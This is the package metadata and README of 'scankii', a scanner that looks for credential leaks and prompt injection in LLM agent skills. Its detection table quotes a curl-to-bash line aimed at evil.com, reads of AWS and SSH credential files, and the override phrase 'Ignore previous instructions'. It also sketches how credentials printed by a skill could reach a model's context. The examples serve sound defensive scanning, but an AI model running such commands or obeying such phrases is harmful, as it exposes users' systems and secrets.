Metadata-Version: 2.4
Name: scankii
Version: 0.1.0
Summary: Scan LLM agent skill directories for credential leakage
Requires-Python: >=3.10
Requires-Dist: click
Requires-Dist: pyyaml
Requires-Dist: rich
Requires-Dist: tree-sitter
Requires-Dist: tree-sitter-javascript
Requires-Dist: tree-sitter-python
Provides-Extra: dev
Requires-Dist: pytest; extra == 'dev'
Description-Content-Type: text/markdown

# scankii

**The Open-Source, Local-First Semgrep for AI Agent Skills.**

`scankii` is a specialized static analysis tool designed to detect credential leaks, prompt injections, and cross-modal vulnerabilities in AI agent skills before they are deployed. 

Unlike traditional secret scanners that only inspect source code, `scankii` understands the agent execution model. It analyzes both your **Natural Language instructions (`SKILL.md`)** and your **source code** together as a single unit to catch complex, multi-stage credential exposures that other tools miss.

---

## The Problem: Cross-Modal Leakage

In modern LLM agent architectures, agents read natural language instructions and execute code. This creates a unique vulnerability:

1. **The Code is "Safe":** The source code might securely read an API key from the environment and use it.
2. **The Markdown is "Safe":** The `SKILL.md` might benignly explain how to use the skill.
3. **The Intersection is Vulnerable:** If the `SKILL.md` instructs the agent to pass a credential to a function, and that function prints it for debugging, the agent framework captures that `stdout` and injects it back into the LLM context window. The secret is now exposed to prompt injection attacks.

`scankii` is the first open-source scanner purpose-built to detect these cross-modal vulnerabilities.

---

## How scankii works

`scankii` employs a dual-engine static analysis pipeline to evaluate both the instructional and executable components of an agent skill simultaneously.

```mermaid
graph TD
    subgraph "scankii Pipeline"
        direction TB
        
        subgraph "1. Static Analysis"
            A[SKILL.md] -->|Natural Language| B[NLP Semantic Analyzer]
            C[Source Code] -->|AST Parsing| D[AST Syntax Analyzer]
        end
        
        subgraph "2. Cross-Modal Correlation"
            B -->|Extracted Intents| E{Cross-Modal Engine}
            D -->|Variable Sinks| E
        end
        
        subgraph "3. Scoring & Reporting"
            E -->|Unmatched Findings| F[Scorer]
            E -->|Correlated Leaks| F
            F -->|Severity Assessment| G[Reporters]
        end
    end
    
    G --> H((Terminal UI))
    G --> I((JSON))
    G --> J((SARIF))
    
    style A fill:#f9f,stroke:#333,stroke-width:2px
    style C fill:#bbf,stroke:#333,stroke-width:2px
    style E fill:#f96,stroke:#333,stroke-width:2px
```

1. **NLP Semantic Analyzer:** Uses constrained pattern matching to scan `SKILL.md` for prompt injections, social engineering, and instructions that mandate the passing of credentials.
2. **AST Syntax Analyzer:** Parses the source code to build an Abstract Syntax Tree. It tracks variables and detects if they flow into dangerous sinks like `print()`, file I/O, or unauthenticated network requests.
3. **Cross-Modal Engine:** Correlates findings from both engines. If the `SKILL.md` instructs passing an API key, and the code prints that parameter to stdout, the engine escalates it as a high-severity cross-modal leak.
4. **Scorer:** Applies a multiplicative scoring model based on exploitability, channel risk, and credential type to determine the final severity (LOW to CRITICAL).

---

## Demo

```
$ scankii scan examples/vulnerable-skill --explain

┏━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━┓
┃ File   ┃ Line ┃ Pattern          ┃ Channel ┃ Severity ┃
┡━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━┩
│ run.py │    7 │ Cross-Modal Leak │ stdout  │  MEDIUM  │
│ run.py │    9 │ Cross-Modal Leak │ network │ CRITICAL │
│ run.py │    7 │ Cross-Modal Leak │ stdout  │  MEDIUM  │
│ run.py │    9 │ Cross-Modal Leak │ network │ CRITICAL │
│ run.py │    7 │ Cross-Modal Leak │ stdout  │  MEDIUM  │
│ run.py │    9 │ Cross-Modal Leak │ network │ CRITICAL │
└────────┴──────┴──────────────────┴─────────┴──────────┘

  Total: 6  (CRITICAL: 3, MEDIUM: 3)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🚨 CRITICAL — Information Exposure via network
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Pattern:   Information Exposure
Channel:   network
File:      run.py, line 9
Score:     5.04

Attack Flow:
  SKILL.md [line 1]              ← instructs agent to pass api_key to execute()
  ↓
  execute(api_key) [run.py:9]    ← credential enters function
  ↓
  requests.get(api_key) [run.py] ← sinks to network
  ↓
  network                        ← exfiltrated externally
  ↓
  LLM context window             ← credential now queryable via natural language

Suggested Fix:
  Replace:  hardcoded credential in network call
  With:     Read credential from environment variable
            import os
            api_key = os.environ.get('API_KEY')

╭──────────────────────────────╮
│     Scan Summary             │
│  ┏━━━━━━━━━━┳━━━━━━━┓        │
│  ┃ Severity ┃ Count ┃        │
│  ┡━━━━━━━━━━╇━━━━━━━┩        │
│  │ CRITICAL │     3 │        │
│  │ HIGH     │     0 │        │
│  │ MEDIUM   │     3 │        │
│  │ LOW      │     0 │        │
│  │ TOTAL    │     6 │        │
│  └──────────┴───────┘        │
╰──────────────────────────────╯
```

---

## Install

```bash
pip install scankii
```

---

## Usage

`scankii` runs 100% locally. Your code and proprietary agent skills never leave your machine.

### Scan a skill directory (default terminal output)
```bash
scankii scan ./my-skill/
```

### Scan with detailed attack flow explanation
```bash
scankii scan ./my-skill/ --explain
```

### Export findings as JSON
```bash
scankii scan ./my-skill/ --format json
```

### Export findings as SARIF (for GitHub Code Scanning)
```bash
scankii scan ./my-skill/ --format sarif
```

---

## What It Detects

| # | Pattern | Description | Example |
|---|---------|-------------|---------|
| 1 | **Hardcoded API Keys** | OpenAI, Groq, AWS, GitHub, Google, Slack keys in source | `API_KEY = "sk-proj-..."` |
| 2 | **Credential-to-Stdout** | Credentials passed to `print()`, `console.log()` | `print(f"key={api_key}")` |
| 3 | **Credential-to-Network** | Credentials sent via `requests.post()`, `fetch()` | `requests.post(url, data=token)` |
| 4 | **Cross-Modal Leak** | SKILL.md instructs agent to pass credential to function that sinks it | SKILL.md says "pass api_key" + code has `print(api_key)` |
| 5 | **Prompt Injection** | NL instructions to override safety, ignore prior context | "Ignore previous instructions and..." |
| 6 | **Social Engineering** | NL patterns soliciting credentials from users | "Paste your API key here" |
| 7 | **Connection String Exposure** | MongoDB, PostgreSQL, MySQL URIs with embedded passwords | `mongodb://user:pass@host/db` |
| 8 | **Private Key Exposure** | RSA/EC private key blocks in source files | `-----BEGIN RSA PRIVATE KEY-----` |
| 9 | **Reverse Shell / RCE** | Reverse shells, `curl | bash`, base64 obfuscation | `curl https://evil.com/x | bash` |
| 10 | **Credential Theft** | Reading `.env`, `.aws/credentials`, `~/.ssh/id_rsa` + exfil | `open(".aws/credentials").read()` |

---

## Why Not TruffleHog / GitLeaks / detect-secrets?

| Feature | TruffleHog | GitLeaks | detect-secrets | **scankii** |
|---------|-----------|----------|----------------|-----------------|
| Regex secret scanning | ✅ | ✅ | ✅ | ✅ |
| Git history scanning | ✅ | ✅ | ❌ | ❌ |
| SKILL.md NL analysis | ❌ | ❌ | ❌ | ✅ |
| Cross-modal detection | ❌ | ❌ | ❌ | ✅ |
| AST-based sink tracking | ❌ | ❌ | ❌ | ✅ |
| stdout→LLM flow detection | ❌ | ❌ | ❌ | ✅ |
| Attack flow visualization | ❌ | ❌ | ❌ | ✅ |
| Prompt injection detection | ❌ | ❌ | ❌ | ✅ |
| Credential redaction runtime | ❌ | ❌ | ❌ | ✅ |
| SARIF output | ❌ | ✅ | ❌ | ✅ |

Existing tools scan your code for static secrets. `scankii` is purpose-built for LLM agent skills, focusing on the intersection of natural language and code execution.

---

## credential-safe: The Cure

Finding vulnerabilities is only half the battle. `scankii` includes `credential-safe`, a drop-in replacement for `print()` and Python logging that automatically redacts credentials before they reach stdout (and therefore the LLM context window).

```python
from credential_safe import SafeLogger, safe_print

logger = SafeLogger()
logger.info(f"Using key: {api_key}")
# Output: INFO: Using key: sk-[REDACTED]

safe_print(f"Token: {token}")
# Output: Token: ghp-[REDACTED]
```

```bash
pip install credential-safe
```

---

## Enterprise Integrations

### GitHub Action

Add to your workflow to scan skills on every PR and upload results to GitHub Code Scanning:

```yaml
name: Skill Guard
on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: scankii/scankii@v1
        with:
          path: ./skills/
          severity-threshold: high
          sarif-upload: true
          fail-on-findings: true
```

### Pre-commit Hook

Stop secrets from being committed locally. Add to `.pre-commit-config.yaml`:

```yaml
repos:
  - repo: https://github.com/scankii/scankii
    rev: v0.1.0
    hooks:
      - id: scankii
        name: scankii
        entry: hooks/pre-commit
        language: script
        types: [file]
        files: '\.(md|py|js|ts)$'
```

---

## Using the Secure Template

Copy our hardened SKILL.md template to start building a new skill securely from day one:

```bash
cp templates/SKILL.md.template my-new-skill/SKILL.md
```

The template includes:
- Inline security comments explaining what NOT to do
- Correct credential handling patterns (environment variables only)
- A security checklist to verify before publishing

---

## Contributing

1. Fork the repository
2. Create a feature branch: `git checkout -b feature/my-feature`
3. Write tests for your changes
4. Ensure all tests pass: `pytest tests/ -v`
5. Run scankii on the repo: `scankii scan .`
6. Submit a pull request

### Development Setup

```bash
git clone https://github.com/scankii/scankii.git
cd scankii
pip install -e ".[dev]"
pytest tests/ -v
```

---

## License

MIT
